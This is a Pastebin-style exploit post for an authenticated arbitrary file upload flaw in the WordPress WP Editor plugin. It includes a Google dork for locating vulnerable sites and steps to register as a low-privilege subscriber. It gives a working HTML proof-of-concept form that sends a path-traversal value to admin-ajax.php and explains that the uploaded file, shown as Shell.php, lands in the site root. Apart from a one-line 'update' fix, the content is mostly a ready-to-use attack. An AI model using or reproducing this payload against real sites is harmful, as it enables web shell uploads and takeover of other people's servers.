Advertisement
VirusXDz

Wordpress WP Editor Exploit

Sep 2nd, 2016
1,008
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 1.60 KB | None | 0 0
  1. <!--
  2.  
  3.  
  4.     \ \   / (_)_ __ _   _ ___\ \/ /  _ \ ____
  5.      \ \ / /| | '__| | | / __|\  /| | | |_  /
  6.       \ V / | | |  | |_| \__ \/  \| |_| |/ /
  7.        \_/  |_|_|   \__,_|___/_/\_\____//___|
  8.        
  9.                                               -->
  10. #########################################################
  11. # Exploit Title: Wordpress WP Editor Authenticated Arbitrary File Upload Vulnerability
  12. # Category: webapps
  13. # Software Link: https://wordpress.org/plugins/wp-editor/
  14. # version affected : 1.2.5.x
  15. # Google Dork : inurl:/wp-content/plugins/wp-editor/
  16. ########################################################
  17.  
  18. -------------------------------------------------------------------------------
  19.  
  20. # [-]Proof of Concept
  21.  
  22. <html>
  23. <head>
  24. </head>
  25. <body>
  26. <form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="post" enctype="multipart/form-data">
  27. <input type="hidden" name="action" value="upload_files" />
  28. <input type="hidden" name="current_plugin_root" value="../" />
  29. <input type="hidden" name="directory" value="" />
  30. <input type="file" name="file-0" />
  31. <input type="submit" value="Submit" />
  32. </form>
  33. </body>
  34. </html>
  35.  
  36. #
  37. # logged in to Wordpress as a "subscriber level or higher user"
  38. #
  39. # Add User subscriber
  40. # /wp-login.php?action=register
  41. #
  42. # upload the chosen file using The following proof of concept
  43. # the Uploaded file will be in the root directory of the WordPress installation
  44. # http://www.Target.com/Shell.php
  45. -------------------------------------------------------------------------------
  46.  
  47. solution :
  48. update to the latest version
  49.  
  50. Video
  51. https://youtu.be/wShvHCecPtg
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement